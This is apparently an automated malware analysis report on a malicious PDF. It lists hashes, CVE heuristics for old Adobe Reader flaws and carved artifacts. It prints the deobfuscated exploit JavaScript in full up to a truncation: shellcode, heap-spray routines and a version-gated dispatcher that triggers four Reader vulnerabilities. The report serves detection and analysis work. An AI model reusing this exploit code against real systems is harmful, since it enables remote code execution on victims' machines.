Malicious PDF — malware analysis report

Static analysis result for SHA-256 72d3b6b6541dc902…

MALICIOUS

PDF

3.5 KB Authoring application: rxode (via va)
MD5: 05fb0d5dbb2d8b095950e043f5719f28 SHA-1: 0dcf74fffbfa9c6b759ab26597274562977b5f72 SHA-256: 72d3b6b6541dc90240664d6d89ca6278dd6b50772ed29b10d1b56280b7cab595
418 Risk Score

Malware Insights

MITRE ATT&CK
T1203 Exploitation for Client Execution T1059.007 JavaScript

The PDF file contains XFA forms with embedded JavaScript that exploits multiple known Adobe Reader vulnerabilities. The deobfuscated JavaScript appears to be a shellcode payload, likely intended to download and execute a second-stage exploit or malware. The specific vulnerabilities targeted are CVE-2009-4324, CVE-2009-0927, CVE-2007-5659, and CVE-2008-2992.

Machine Learning

  • Nyx PDF Classifier malicious score 1.0000

Heuristics 11

  • media.newPlayer — CVE-2009-4324 critical CVE exact CVE_2009_4324
    PDF JavaScript calls media.newPlayer — CVE-2009-4324 is a use-after-free in Adobe Reader's multimedia plugin triggered by media.newPlayer(). Actively exploited as a zero-day in December 2009. (identified after JavaScript deobfuscation)
  • Collab.getIcon — CVE-2009-0927 critical CVE exact CVE_2009_0927
    PDF JavaScript calls Collab.getIcon — CVE-2009-0927 is a stack buffer overflow in Adobe Reader triggered by Collab.getIcon() with a crafted argument. Allows arbitrary code execution. (identified after JavaScript deobfuscation)
  • Collab.collectEmailInfo — CVE-2007-5659 critical CVE exact CVE_2007_5659
    PDF JavaScript calls Collab.collectEmailInfo — CVE-2007-5659 is a buffer overflow in Adobe Reader triggered by a long argument or heap-sprayed message field passed to Collab.collectEmailInfo(). Part of a series of Acrobat JS API exploits. (identified after JavaScript deobfuscation)
  • util.printf — CVE-2008-2992 critical CVE exact CVE_2008_2992
    PDF JavaScript calls util.printf() — CVE-2008-2992 is a stack buffer overflow in Adobe Reader triggered by a long format-specifier argument. Widely exploited in the wild after disclosure. (identified after JavaScript deobfuscation)
  • Pidief-style multi-CVE JavaScript dispatcher critical CVE likely PDF_PIDIEF_MULTI_CVE_DISPATCH
    A single JavaScript body branches on app.viewerVersion and invokes two or more of the canonical Reader sinks (Collab.collectEmailInfo, Collab.getIcon, util.printf with a field-width format string). This is the 2009-2010 Pidief.J multi-exploit landing template: a per-version dispatcher that fires the matching CVE chain for whichever Reader version opens the file.
  • Multi-CVE Adobe Reader JavaScript exploit kit critical PDF_ADOBE_READER_MULTI_CVE_JS_KIT
    One recovered JavaScript stage contains multiple version-gated Adobe Reader exploit branches. This is stronger evidence than independent API keywords: the PDF is selecting old Reader vulnerabilities by viewer version and running heap-sprayed Acrobat JavaScript exploit paths.
  • Embedded file low PDF_EMBEDDED
    PDF embeds a file attachment — could carry an executable or another weaponised document as a nested payload
  • XFA form low PDF_XFA
    PDF uses XML Forms Architecture — can contain script logic
  • Embedded script payload in PDF stream low PDF_EMBEDDED_SCRIPT_PAYLOAD
    PDF stream bytes contain an HTML/XFA <script> tag without accompanying Windows shell-execution primitives — common in accessible XFA forms but worth surfacing for analyst review.
  • Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://ns.adobe.com/xdp/ In PDF document text
    • http://www.xfa.org/schema/xci/1.0/In PDF document text
    • http://www.xfa.org/schema/xfa-template/2.5/In PDF document text
    • http://www.xfa.org/schema/xfa-data/1.0/In PDF document text

Extracted artifacts 2

Files carved from inside the sample during analysis.

FilenameKindSourceSize
embedded_file_obj0004.bin
0f47db13b6328c00abd10bd59824b6af24c50e8026735430b8c6942a4a6c31e2		 pdf-embedded-file PDF EmbeddedFile object 4 at offset 0xDB 11238 bytes
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 1 long base64-like blob(s).
xfa_hex_stage_000.js
69de16e110869f36ce74c661b7aa7e482333f94e6328c3996cba8172d936e6f7		 deobfuscated-js XFA hex-decoded JavaScript (decompressed, direct) at offset 0x64C 4807 bytes
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 12 eval/decoder/string-building token(s). Carved artifact contains 1 long base64-like blob(s).
Preview script
First 1,000 lines of the extracted script
var bjsg = '%u9090%u9090%u16eb%ub1b9%u0001%u8b00%u2434%uf789%u3e80%u74e9%uac06%u8534%ue2aa%uc3fa%ue5e8%uffff%u6cff%u8489%u8585%u04db%ud969%u8584%u0c85%u0862%u95ca%uea08%ub4d1%ud25e%ud6d4%ud6d6%ud6d6%ud6d6%ud6d0%uedd6%u8481%u8585%ud3d0%uedd6%uebea%u8585%uf0ed%ue9f7%ud1e8%u0bed%u8bcb%u6d69%u85cd%u8585%u6dd5%u85f9%u8585%u557a%u4106%ued8d%u6aca%u80ca%u6dd5%u85e9%u8585%u557a%u4500%u92f0%ud1ef%u76dc%ued2f%u7bf7%u9336%u986d%u8585%ud585%ud46d%u8585%u7a85%ud655%u7bef%u0ced%u84ea%u6d38%u858d%u8585%u6dd5%u85b9%u8585%u557a%ub4e5%ue145%ud50e%u0eb5%u89d7%ud70e%u0e91%uadf7%u9d3c%u8585%ub485%ub47a%u2945%ue4b9%u87f9%ua5a9%u4a44%u8488%u6742%u0475%ude7a%ucf39%u0eef%u95c7%u970e%u5cf0%uc10c%u99a1%u46e4%u0ee5%ua1e9%u0ea1%ub9c0%ud10e%ufd80%u6f84%ucf0e%u0e9d%ua5df%u6e84%ub166%u0ecc%u0eb1%u6b84%u7ab4%u45b4%u2979%u4501%u82f1%u4a44%u8488%u6e42%ube71%ua1f9%uf0ad%u0e64%ua1df%u6e84%u0ee3%uce89%udf0e%u8499%u0e6e%u0e81%u6d84%uc10c%u99a1%u47e4%u858d%u6a6d%u7a7b%ued7a%uf1f1%ubff5%uaaaa%ue6e8%uefeb%uf4e4%ue6ab%ue8ea%ufdaa%ufffc%ub3aa%ue3b1%ue4b5%ue3b5%ue4e4%ue4b2%ue7b1%ue6b6%ub3e3%ub2e7%ub4b7%ub7bc%ub4b1%ub5b7%ue7bd%ub7e3%ue1bc%ub5bc%ub4e1%ue3b6%ub5e1%ub7b1%ue4e6%ue3b7%ub3b2%ue7b7%ub2b4%ub4b2%ubce0%ue7b6%ue4e1%ub2b2%ub3b4%ue4b6%ub3bd%ubde3%ub7b6%ub0b1%ub7e4%ue6bd%ub1b0%ue7b2%ub0e0%ub4e3%ue6b1%ub5e1%ue6b4%ue4bd%ub6b3%ubcb4%ue0b1%ue3e4%ue0e7%ub7e0%ub1b1%ue6bc%ue6bd%ub2b6%ubce0%ue3e6%ub3b7%ue1b0%ub5b6%ue7e4%ubabd%ub8ec%u85b6';function ezvr(ra, qy) {    while (ra.length * 2 < qy) {        ra += ra;    }    ra = ra.substring(0, qy / 2);    return ra;}function bx() {    var dkg = new Array();    var vw = 0x0c0c0c0c;    var addr = 0x400000;    var payload = unescape(bjsg);    var sc_len = payload.length * 2;    var qy = addr - (sc_len + 0x38);    var yarsp = unescape('%u9090%u9090');    yarsp = ezvr(yarsp, qy);    var count2 = (vw - 0x400000) / addr;    for (var count = 0; count < count2; count++) {        dkg[count] = yarsp + payload;    }    var overflow = unescape('%u0c0c%u0c0c');    while (overflow.length < 44952) {        overflow += overflow;    }    this.collabStore = Collab.collectEmailInfo({        subj: '',        msg: overflow    });}function printf() {    nop = unescape('%u0A0A%u0A0A%u0A0A%u0A0A');    var payload = unescape(bjsg);    heapblock = nop + payload;    bigblock = unescape('%u0A0A%u0A0A');    headersize = 20;    spray = headersize + heapblock.length;    while (bigblock.length < spray) {        bigblock += bigblock;    }    fillblock = bigblock.substring(0, spray);    block = bigblock.substring(0, bigblock.length - spray);    while (block.length + spray < 0x40000) {        block = block + block + fillblock;    }    mem = new Array();    for (i = 0; i < 1400; i++) {        mem[i] = block + heapblock;    }    var num = 12999999999999999999888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888;    util.printf('%45000f', num);}function geticon(sc) {var shellcode=unescape(bjsg);garbage='';while(garbage.length!=480){garbage+=unescape('%u9090');}garbage=garbage+shellcode;nopblock=unescape('%u9090%u9090'); headersize=10;acl=headersize+garbage.length;while(nopblock.length<acl){nopblock+=nopblock;}fillblock=nopblock.substring(0,acl);block=nopblock.substring(0, nopblock.length-acl);while(block.length+acl<0x40000){block=block+block+fillblock;}memory=new Array();for (i=0;i<180;i++){memory[i]=block+garbage;}var buffersize=4012;var buffer=Array(buffersize);for(i=0;i<buffersize;i++){buffer[i]=unescape('%0a%0a%0a%0a');}Collab.getIcon(buffer+'_N.bundle');}aPlugins = app.plugIns;var sv = parseInt(app.viewerVersion.toString().charAt(0));for (var i = 0; i < aPlugins.length; i++) {    if (aPlugins[i].name == 'EScript') {        var lv = aPlugins[i].version;    }}if ((lv == 9) || ((sv == 8) && (lv <= 8.12))) {    geticon();} else if (lv == 7.1) {    printf();} else if (((sv == 6) || (sv == 7)) && (lv < 7.11)) {    bx();} else if ((lv >= 9.1) || (
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.